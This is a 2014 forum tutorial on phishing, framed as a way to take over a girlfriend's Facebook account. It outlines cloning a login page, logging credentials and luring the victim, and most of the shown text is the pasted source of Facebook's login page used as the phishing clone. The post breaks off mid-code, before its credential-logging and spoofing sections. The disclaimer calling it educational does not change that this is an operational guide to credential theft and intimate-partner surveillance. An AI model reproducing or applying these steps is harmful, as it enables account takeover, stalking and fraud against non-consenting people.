The Art of Phishing

Social engineering is the art of manipulating people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery for information gathering or computer system access and in most cases the attacker never comes face-to-face with the victim.

The Art of Phishing

Post by -Ninjex- on Mon Oct 27, 2014 9:24 am
([msg=84607]see The Art of Phishing[/msg])

Disclaimer: You are responsible for all your actions. I do not condone any illegal activities, nor does Hackthissite. This information is purely for educational purposes.
All credentials gathered from individuals visiting my phishing page released within this article, are considered to have given prior consent, and made knowledgeable of the consequences, as well as the information withheld inside this article before entering confidential information to my site.

Getting access to your girlfriends facebook:
So, she is your girlfriend and most likely not tech-savy.
You claim she might be cheating on you, or hiding something, but really you are just a paranoid psycho.
The easiest way you can take over her account is from social engineering. If you can't convince your girlfriend to do something, you are terrible at life.
I would talk about some plugins like firesheep, however with the uproar in SSL, this isn't a very viable option.
So instead, I will be demonstrating how phishing attacks are crafted, and the methodology behind them.
In layman terms, a phishing attack is simply creating a web page that looks as similar as possible to the site's login page that you want the user's information from.
This new, maliciously crafted web page will host a script that grabs the user's credentials and logs them.

Phishing
A. Web Design Structure
1. HTML & CSS
2. PHP & SQL

B. Forms
1. What is a form
2. GET & POST
3. Common uses of forms

C. Phishing
1. Looking at the source
2. Cloning a page
3. Modify the clone
4. Logging credentials
5. Redirecting

D. Social Engineering & Tactics
1. Homepage / Bookmarks
2. Sending a link
3. URL Redirects
4. Wait bait
5. Spoofing E-mail
6. Spoofing Numbers
7. Portability

A. [Web Design Structure]
1. [HTML & CSS]
- HTML is the part of a web page that handles the structure behind the page.
- CSS is the part of a page that will tell things where to go, what to look like, etc. CSS is essentially there to make the page look 'pretty'

2. [PHP & SQL]
- PHP is a server side language, that handles things like sessions, cookies, and user input. If you have ever noticed a '.php' extension on a page you are visiting, that's a file which contains PHP code. PHP is usually used to do
something with user input, or to create dynamic content for the user. PHP is also the most common language used in web development, and for communicating with a database.
- SQL or Server Query Language, is a language that is used to communicate with a database. Databases usually contain confidential and relevant information, such as: usernames, passwords, ip history, credit card information, etc

If a car was a web page, the frame would be the HTML (basic structure), the paint and furniture would be the CSS (making it appear more pretty), the gas pedal would be considered the PHP (does something with user input, and in a way communicates with the gas tank), and the dash board would be considered the database (holds relevant information)

B. [Forms]
1. [What is a form]
- A form is a piece of HTML code that is used to get information from a user. A form can send out the information gathered to be processed by some other scripts (usually PHP scripts)
- An example form below would take some username/password and send it off to get processed by a file called process.php
Code: Select all
<form name="input" action="process.php" method="post">
Username: <input type="text" name="user">
Password: <input type="password" name="pass">
<input type="submit" value="Login">
</form>


2. [GET & POST]
- I assume it's worth mentioning the difference between GET and POST data forms. A POST form like the one above (notice the method="post" attribute) will pass things to the action page in a hidden manner. A GET form would pass the data to the page using additional parameters. An example from the above with username: bob and password: bob101 would look similar to http://www.site.com/process.php?user=bob&pass=bob101. When passing along confidential information, be weary of the difference, and don't use a GET form.

3. [Common uses of forms]
- One of the most common type of form you will likely encounter is a login form, which usually asks for a username (or email) and a password.
- Forms are used to process transactions (like buying things on Ebay or Amazon)
- Registration forms are used to get user information during the registration process.
- Forms even handle things like changing account security details

C. [Phishing]
Now that we have some general knowledge on what a form is, and how web pages are constructed, we can get onto the more fun stuff. Like performing a phishing attack.
My goal here isn't to just show you how to get credentials. My goal is to help you learn something new, hence the information talked about up to this point.

1. [Looking at the source]
- You can view any pages source code at any time by hitting the cntrl+u shortcut on your keyboard. Viewing a pages source code can cue you in on many things (like potential vulnerabilities), but that's a story for another day.

2. [Cloning a page]
- Okay, the title is somewhat misleading, we will not literally be cloning a page. We will be creating a page that 'looks' just like another page. The reason that we can not actually clone the page, is because we will not always have access to the server side code being used. However, we can grab all the client side code, like the HTML, CSS, and JavaScript, which is really all we will be needing to make the page look identical to our target page. So this process is actually going to be very simple. Navigate to the login page of the target website (in the case of facebook, the login is on the home page) hit cntrl+u to view the page source. Now, you are simply going to copy all the code. The shortcut for this is hitting cntrl+a to select all, then hitting cntrl+c to copy the code. Now that you have the code, we need to discuss hosting. You can host files locally on your own computer, or you can get a domain for some small fee. Whichever case you choose to go with, just make sure you are able to execute PHP code. For a server I also recommend you have some database access. (I'm not going over how to set up a server, locally or otherwise in this tutorial). So, now you are going to want to take the information and save it to a file with a name similar to login.php to make things appear less suspicious.

3. [Modifying the clone]
- So, now that you have the cloned page, there is a major change you are going to want to make. In the case of facebook our source code should look like so:
Code: Select all
<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>function envFlush(a){function b(c){for(var d in a)c[d]=a[d];}if(window.requireLazy){window.requireLazy(['Env'],b);}else{Env=window.Env||{};b(Env);}}envFlush({"ajaxpipe_token":"AXixXRT758ym20j2","lhsh":"RAQGe_wAv","khsh":"0`sj`e`rm`s-0fdu^gshdoer-0gc^eurf-3gc^eurf;1;enbtldou;fduDmdldourCxO`ld-2YLMIuuqSdptdru;qsnunuxqd;rdoe"});</script><script>CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?login_attempt=1&amp;_fb_noscript=1" /></noscript><meta name="referrer" content="default" id="meta_referrer" /><title id="pageTitle">Facebook</title><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?login_attempt=1" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login" /><link rel="alternate" media="only screen and (max-width: 640px)" href="https://www.facebook.com/login" /><link rel="alternate" media="handheld" href="https://www.facebook.com/login" /><link rel="alternate" hreflang="x-default" href="https://www.facebook.com/login" /><link rel="alternate" hreflang="en" href="https://www.facebook.com/login" /><link rel="alternate" hreflang="ar" href="https://ar-ar.facebook.com/login" /><link rel="alternate" hreflang="bg" href="https://bg-bg.facebook.com/login" /><link rel="alternate" hreflang="bs" href="https://bs-ba.facebook.com/login" /><link rel="alternate" hreflang="ca" href="https://ca-es.facebook.com/login" /><link rel="alternate" hreflang="da" href="https://da-dk.facebook.com/login" /><link rel="alternate" hreflang="el" href="https://el-gr.facebook.com/login" /><link rel="alternate" hreflang="es" href="https://es-la.facebook.com/login" /><link rel="alternate" hreflang="es-es" href="https://es-es.facebook.com/login" /><link rel="alternate" hreflang="fa" href="https://fa-ir.facebook.com/login" /><link rel="alternate" hreflang="fi" href="https://fi-fi.facebook.com/login" /><link rel="alternate" hreflang="fr" href="https://fr-fr.facebook.com/login" /><link rel="alternate" hreflang="fr-ca" href="https://fr-ca.facebook.com/login" /><link rel="alternate" hreflang="hi" href="https://hi-in.facebook.com/login" /><link rel="alternate" hreflang="hr" href="https://hr-hr.facebook.com/login" /><link rel="alternate" hreflang="id" href="https://id-id.facebook.com/login" /><link rel="alternate" hreflang="it" href="https://it-it.facebook.com/login" /><link rel="alternate" hreflang="ko" href="https://ko-kr.facebook.com/login" /><link rel="alternate" hreflang="mk" href="https://mk-mk.facebook.com/login" /><link rel="alternate" hreflang="ms" href="https://ms-my.facebook.com/login" /><link rel="alternate" hreflang="pl" href="https://pl-pl.facebook.com/login" /><link rel="alternate" hreflang="pt" href="https://pt-br.facebook.com/login" /><link rel="alternate" hreflang="pt-pt" href="https://pt-pt.facebook.com/login" /><link rel="alternate" hreflang="ro" href="https://ro-ro.facebook.com/login" /><link rel="alternate" hreflang="sl" href="https://sl-si.facebook.com/login" /><link rel="alternate" hreflang="sr" href="https://sr-rs.facebook.com/login" /><link rel="alternate" hreflang="th" href="https://th-th.facebook.com/login" /><link rel="alternate" hreflang="vi" href="https://vi-vn.facebook.com/login" /><meta name="description" content="Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with..." /><meta name="robots" content="noodp,noydir" /><noscript><meta http-equiv="X-Frame-Options" content="DENY" /></noscript><link rel="shortcut icon" href="https://fbstatic-a.akamaihd.net/rsrc.php/yl/r/H3nktOa7ZMg.ico" />
    <link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yM/r/GjpdRKdIhhI.css" />
    <link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/ym/r/LTPkjGCoITI.css" />
    <link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yg/r/Cwm8k3kJTRY.css" />
    <link type="text/css" rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yg/r/yk5mtKZjv4H.css" />

    <script src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yY/r/aY29MwcYK3B.js" crossorigin="anonymous"></script>
<script>(require("ServerJSDefine")).handleDefines([["URLFragmentPreludeConfig",[],{"incorporateQuicklingFragment":true,"hashtagRedirect":true},137],["BootloaderConfig",[],{},329],["CurrentUserInitialData",[],{"USER_ID":"0","ACCOUNT_ID":"0"},270],["SiteData",[],{"revision":1468811,"tier":"","push_phase":"V3","pkg_cohort":"EXP1:DEFAULT","vip":"31.13.65.33"},317],["UserAgentData",[],{"browserFullVersion":"33.0","browserMinorVersion":0,"browserName":"Firefox","browserVersion":33,"deviceName":"Unknown","engineName":"Gecko","engineVersion":"33.0","platformName":"Windows","platformVersion":"8","platformFullVersion":"8.1"},527],["CurrentCommunityInitialData",[],{},490],["DTSGInitialData",[],{},258],["ISB",[],{},330],["LSD",[],{"token":"AVpgFClF"},323],["BanzaiConfig",[],{"EXPIRY":86400000,"MAX_SIZE":10000,"MAX_WAIT":150000,"RESTORE_WAIT":150000,"blacklist":["time_spent"],"gks":{"adapterhooks":true,"boosted_pagelikes":true,"boosted_website":true,"boosted_posts":true,"jslogger":true,"miny_compression":true,"pages_client_logging":true,"time_spent_bit_array":true,"time_spent_debug":true,"useraction":true,"videos":true,"visibility_tracking":true,"vitals":true}},7],["AsyncRequestConfig",[],{"retryOnNetworkError":"1"},328],["FbtLogger",[],{"logger":null},288],["FbtQTOverrides",[],{"overrides":{"8b0c31a270a324f26d2417a358106611":"Replacement QT String!"}},551],["EagleEyeConfig",[],{"seed":"08kH"},294],["TrackingConfig",[],{"domain":"https:\/\/pixel.facebook.com"},325],["ErrorSignalConfig",[],{"uri":"https:\/\/error.facebook.com\/common\/scribe_endpoint.php"},319],["InitialServerTime",[],{"serverTime":1414406746000},204],["UFIConstants",[],{"UFIActionType":{"COMMENT_LIKE":"fa-type:comment-like","COMMENT_SET_SPAM":"fa-type:mark-spam","DELETE_COMMENT":"fa-type:delete-comment","DISABLE_COMMENTS":"fa-type:disable-comments","LIVE_DELETE_COMMENT":"fa-type:live-delete-comment","LIKE_ACTION":"fa-type:like","SUBSCRIBE_ACTION":"fa-type:subscribe","REMOVE_PREVIEW":"fa-type:remove-preview","MARK_COMMENT_SPAM":"fa-type:mark-spam","CONFIRM_COMMENT_REMOVAL":"fa-type:confirm-remove","TRANSLATE_COMMENT":"fa-type:translate-comment","COMMENT_LIKECOUNT_UPDATE":"fa-type:comment-likecount-update","ADD_COMMENT_ACTION":"fa-type:add-comment"},"UFICommentOrderingMode":{"CHRONOLOGICAL":"chronological","RANKED_THREADED":"ranked_threaded","TOPLEVEL":"toplevel","RECENT_ACTIVITY":"recent_activity","FEATURED":"featured","UNSUPPORTED":"unsupported"},"UFIFeedbackSourceType":{"PROFILE":0,"NEWS_FEED":1,"OBJECT":2,"MOBILE":3,"EMAIL":4,"PROFILE_APPROVAL":10,"TICKER":12,"NONE":13,"INTERN":14,"ADS":15,"EVENT_GOING_FLYOUT":16,"PHOTOS_SNOWLIFT":17,"NOTIFICATION_FLYOUT":18,"LOCAL_FEED":19,"PHOTOS_SNOWFLAKE":20},"UFIPayloadSourceType":{"UNKNOWN":0,"INITIAL_SERVER":1,"LIVE_SEND":2,"USER_ACTION":3,"ENDPOINT_LIKE":10,"ENDPOINT_COMMENT_LIKE":11,"ENDPOINT_ADD_COMMENT":12,"ENDPOINT_EDIT_COMMENT":13,"ENDPOINT_DELETE_COMMENT":14,"ENDPOINT_COMMENT_SPAM":16,"ENDPOINT_REMOVE_PREVIEW":17,"ENDPOINT_ID_COMMENT_FETCH":18,"ENDPOINT_COMMENT_FETCH":19,"ENDPOINT_TRANSLATE_COMMENT":20,"ENDPOINT_BAN":21,"ENDPOINT_SUBSCRIBE":22,"ENDPOINT_COMMENT_LIKECOUNT_UPDATE":23,"ENDPOINT_DISABLE_COMMENTS":24,"ENDPOINT_ACTOR_CHANGE":25},"UFIStatus":{"DELETED":"status:deleted","SPAM":"status:spam","SPAM_DISPLAY":"status:spam-display","LIVE_DELETED":"status:live-deleted","FAILED_ADD":"status:failed-add","FAILED_EDIT":"status:failed-edit","PENDING_EDIT":"status:pending-edit"},"attachmentTruncationLength":80,"commentTruncationLength":420,"commentTruncationMaxLines":3,"commentTruncationPercent":0.6,"commentURLTruncationLength":60,"defaultPageSize":50,"infiniteScrollRangeForQANDAPermalinks":1000,"minCommentsForOrderingModeSelector":2,"unavailableCommentKey":"unavailable_comment_key"},240]]);new (require("ServerJS"))().handle({"require":[["markJSEnabled"],["lowerDomain"],["URLFragmentPrelude"],["Primer"],["Bootloader"]]});</script></head><body class="login_page fbx UIPage_LoggedOut _2gsg gecko win Locale_en_US" dir="ltr"><div class="_li"><div id="pagelet_bluebar"><div id="blueBarDOMInspector" class="_21mm"><div id="blueBarNAXAnchor" class="_4f7n _xxp"><div><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat _ohe" href="/" title="Go to Facebook Home"><i class="fb_logo img sp_MXzTRXPhpG1 sx_517fe9"><u>Facebook logo</u></i></a></div></div><div class="signupBanner"><div class="signup_bar_container"><div class="signup_box clearfix"><span class="signup_box_content"><a class="_42ft _42fu signup_btn selected _42gz _42gy" role="button" href="/r.php?locale=en_US">Sign Up</a></span></div></div></div></div></div></div></div><div id="globalContainer" class="uiContextualLayerParent"><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial login_page_interstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="rfloat _ohf"><h2 class="accessible_elem">Facebook Login</h2><div class="uiHeaderActions"></div></div><div><h2 class="uiHeaderTitle" aria-hidden="true">Facebook Login</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="login_form_container"><form id="login_form" action="/login.php?login_attempt=1" method="post" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" name="lsd" value="AVpgFClF" autocomplete="off" /><div class="hidden_elem"></div><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="enable_profile_selector" name="enable_profile_selector" value="" /><input type="hidden" autocomplete="off" id="legacy_return" name="legacy_return" value="1" /><input type="hidden" autocomplete="off" id="profile_selector_ids" name="profile_selector_ids" value="" /><input type="hidden" autocomplete="off" id="trynum" name="trynum" value="1" /><input type="hidden" autocomplete="off" name="timezone" value="" id="u_0_0" /><input type="hidden" name="lgnrnd" value="034546_8rF1" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><div class="form_row clearfix"><label for="email" class="login_form_label">Email or Phone:</label><input type="text" class="inputtext" id="email" name="email" value="" tabindex="1" /></div><div class="form_row clearfix"><label for="pass" class="login_form_label">Password:</label><input type="password" name="pass" id="pass" class="inputpassword" tabindex="1" /></div><div class="persistent"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input id="persist_box" type="checkbox" value="1" name="persistent" class="uiInputLabelInput uiInputLabelCheckbox" /><label for="persist_box" class="uiInputLabelLabel">Keep me logged in</label></div></div><input type="hidden" autocomplete="off" id="default_persistent" name="default_persistent" value="0" /><div id="buttons" class="form_row clearfix"><label class="login_form_label"></label><div id="login_button_inline"><label class="uiButton uiButtonConfirm uiButtonLarge" id="loginbutton" for="u_0_1"><input value="Log In" name="login" tabindex="1" type="submit" id="u_0_1" /></label></div><div id="register_link">or <strong><a href="/r.php?next&amp;locale=en_US&amp;display=page" rel="nofollow">Sign up for Facebook</a></strong></div></div><p class="reset_password form_row"><a href="https://www.facebook.com/recover/initiate" target="">Forgot your password?</a></p></div></form></div></div></div><ul class="uiList ptm localeSelectorList _509- _4ki _6-h _6-j _6-i"><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;en_US&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="English (US)">English (US)</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;es_LA&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Spanish">Español</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;pt_BR&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Portuguese (Brazil)">Português (Brasil)</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;fr_FR&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="French (France)">Français (France)</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;de_DE&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="German">Deutsch</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;it_IT&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Italian">Italiano</a></li><li><a dir="rtl" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;ar_AR&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Arabic">العربية</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;hi_IN&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Hindi">हिन्दी</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;zh_CN&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Simplified Chinese (China)">中文(简体)</a></li><li><a dir="ltr" href="https://www.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale(&quot;ja_JP&quot;, &quot;https:\/\/www.facebook.com\/login.php?login_attempt=1&quot;);" title="Japanese">日本語</a></li><li><a class="showMore" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1&amp;source=TOP_LOCALES_DIALOG" title="Show more languages" href="#" role="button">…</a></li></ul></div></div><div id="pageFooter" data-referrer="page_footer"><div id="contentCurve"></div><div role="contentinfo" aria-label="Facebook site links"><table class="uiGrid _51mz navigationGrid" cellspacing="0" cellpadding="0"><tbody><tr class="_51mx"><td class="_51m- hLeft plm"><a href="/mobile/?ref=pf" title="Check out Facebook Mobile.">Mobile</a></td><td class="_51m- hLeft plm"><a href="/find-friends?ref=pf" title="Find anyone on the web.">Find Friends</a></td><td class="_51m- hLeft plm"><a href="/badges/?ref=pf" title="Embed a Facebook badge on your website.">Badges</a></td><td class="_51m- hLeft plm"><a href="/directory/people/" title="Browse our people directory.">People</a></td><td class="_51m- hLeft plm"><a href="/directory/pages/" title="Browse our pages directory.">Pages</a></td><td class="_51m- hLeft plm"><a href="/places/" title="Check out popular places on Facebook.">Places</a></td><td class="_51m- hLeft plm"><a href="/games/" title="Check out Facebook games.">Games</a></td><td class="_51m- hLeft plm"><a href="/directory/places/" title="Browse our places directory.">Locations</a></td><td class="_51m- hLeft plm _51mw"><a href="/facebook" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></td></tr><tr class="_51mx"><td class="_51m- hLeft plm"><a href="/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></td><td class="_51m- hLeft plm"><a href="/pages/create/?ref_type=sitefooter" title="Create a Page">Create Page</a></td><td class="_51m- hLeft plm"><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></td><td class="_51m- hLeft plm"><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a></td><td class="_51m- hLeft plm"><a href="/privacy/explanation" title="Learn about your privacy and Facebook.">Privacy</a></td><td class="_51m- hLeft plm"><a href="/help/cookies/?ref=sitefooter" title="Learn about cookies and Facebook.">Cookies</a></td><td class="_51m- hLeft plm"><a href="/policies/?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></td><td class="_51m- hLeft plm"><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></td></tr></tbody></table></div><div class="mvl copyright"><div><span> Facebook © 2014</span><div class="fsm fwn fcg"><a rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1&amp;source=TOP_LOCALES_DIALOG" title="Use Facebook in another language." href="#" role="button">English (US)</a></div></div></div></div></div></div><script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=1598"+"&m="+m;},5000);}if(top!=self && !false){try{if(parent!=top){throw 1;}var si_cj_d=["apps.facebook.com","apps.beta.facebook.com"];var href=top.location.href.toLowerCase();for(var i=0;i<si_cj_d.length;i++){if (href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj("3 http:\/\/infosploit.com\/test\/phish.php");}catch(e){si_cj("1 \thttp:\/\/infosploit.com\/test\/phish.php");window.document.write("\u003Cstyle>body * {display:none !important;}\u003C\/style>\u003Ca href=\"#\" onclick=\"top.location.href=window.location.href\" style=\"display:block !important;padding:10px\">\u003Ci class=\"img sp_MXzTRXPhpG1 sx_54c74a\" style=\"display:block !important\">\u003C\/i>Go to Facebook.com\u003C\/a>");/*iK0WvLKy*/}}/*]]>*/</script>
<script>requireLazy(["Bootloader"], function(Bootloader) {Bootloader.setResourceMap({"JtyCr":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y8\/r\/F4N5m0sVKrc.js"},"Nm4nS":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yY\/r\/GulZga8NH6I.js"},"fmS14":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yq\/r\/G24lvrTH9Ug.js"},"AhP9C":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yS\/r\/PT85t-Oh-gK.js"},"FlMQw":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yX\/r\/1bJWa1kOOcH.js"},"4vv8\/":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yf\/r\/JvK_C44obT2.js"},"r+ckK":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yM\/r\/GjpdRKdIhhI.css"},"bKKW+":{"type":"css","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/ym\/r\/LTPkjGCoITI.css"},"F5aqA":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yg\/r\/Cwm8k3kJTRY.css"},"nHPXb":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yg\/r\/yk5mtKZjv4H.css"},"YICz5":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/ye\/r\/0ZwTbi-CG_R.js"},"BqQay":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yS\/r\/QDArHBj7y0a.js"},"fE\/se":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yg\/r\/xhEsvAr6JY-.js"},"BANJS":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yg\/r\/mpXNiKjpZ83.js"},"M2Jox":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yo\/r\/tjX70OjzQgL.js"},"q+j1N":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yy\/r\/jO2xJzk0GEQ.js"},"20549":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yB\/r\/QHrOsIWcffr.js"},"cAkXN":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yR\/r\/IQc0ALCNDHy.js"},"oE4Do":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yK\/r\/obqKRvJtthA.js"},"QV2wP":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y9\/r\/5hBuQE3pPO3.js"},"xiSec":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yw\/r\/gqJSLDzQiIt.js"},"ccpBO":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y9\/r\/hWgsbVnFDQl.js"},"cNca2":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y4\/r\/yuKCSDDP1tN.js"},"7O5+\/":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yT\/r\/Qzc057vSWGh.js"},"oxkbG":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yI\/r\/dxzlY_JXlO2.js"},"ge0OI":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y8\/r\/Kku0adwjStu.css"},"VhRBk":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yN\/r\/pc9in0IPnJ1.js"},"VDymv":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yW\/r\/V00-AnCtiR3.css"},"rqGCm":{"type":"css","permanent":1,"crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yt\/r\/1OIHuKx_W5Z.css"},"QMjhY":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yE\/r\/lRELHs__Isc.js"},"3hBYd":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yv\/r\/84QIRKzCnzp.js"},"wxq+C":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/ys\/r\/6QvdZ6KuzBm.js"},"Rs18G":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yI\/r\/iqqxHqHkZcL.js"},"6AU0l":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yX\/r\/uAtB4Wsl2Sl.js"},"AtxWD":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yG\/r\/J74KdXozsKP.js"},"zyFOp":{"type":"js","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/yT\/r\/Ri9nQJbah9T.js"}});if (true) {Bootloader.enableBootload({"React":{"resources":["YICz5","JtyCr"],"module":true},"ExceptionDialog":{"resources":["JtyCr","BqQay","YICz5","r+ckK","F5aqA","fE\/se","BANJS","M2Jox","q+j1N","20549"],"module":true},"AsyncDOM":{"resources":["JtyCr","cAkXN"],"module":true},"ConfirmationDialog":{"resources":["JtyCr","r+ckK","oE4Do"],"module":true},"Dialog":{"resources":["JtyCr","YICz5","r+ckK","F5aqA","QV2wP"],"module":true},"QuickSandSolver":{"resources":["Nm4nS","JtyCr","r+ckK","BqQay","xiSec","ccpBO"],"module":true},"ErrorSignal":{"resources":["JtyCr","cNca2"],"module":true},"Event":{"resources":["JtyCr"],"module":true},"AsyncDialog":{"resources":["JtyCr","BqQay","YICz5","r+ckK","F5aqA"],"module":true},"AsyncRequest":{"resources":["JtyCr"],"module":true},"DialogX":{"resources":["JtyCr","BqQay","YICz5","r+ckK","F5aqA"],"module":true},"XUIDialogTitle.react":{"resources":["YICz5","JtyCr","r+ckK","fE\/se","F5aqA","BANJS"],"module":true},"XUIDialogBody.react":{"resources":["YICz5","JtyCr","F5aqA","fE\/se"],"module":true},"XUIDialogButton.react":{"resources":["YICz5","JtyCr","fE\/se","r+ckK","F5aqA"],"module":true},"XUIDialogFooter.react":{"resources":["YICz5","JtyCr","r+ckK","fE\/se","F5aqA"],"module":true},"XUIGrayText.react":{"resources":["YICz5","JtyCr","F5aqA","fE\/se","q+j1N"],"module":true},"PhotoSnowlift":{"resources":["7O5+\/","JtyCr","YICz5","r+ck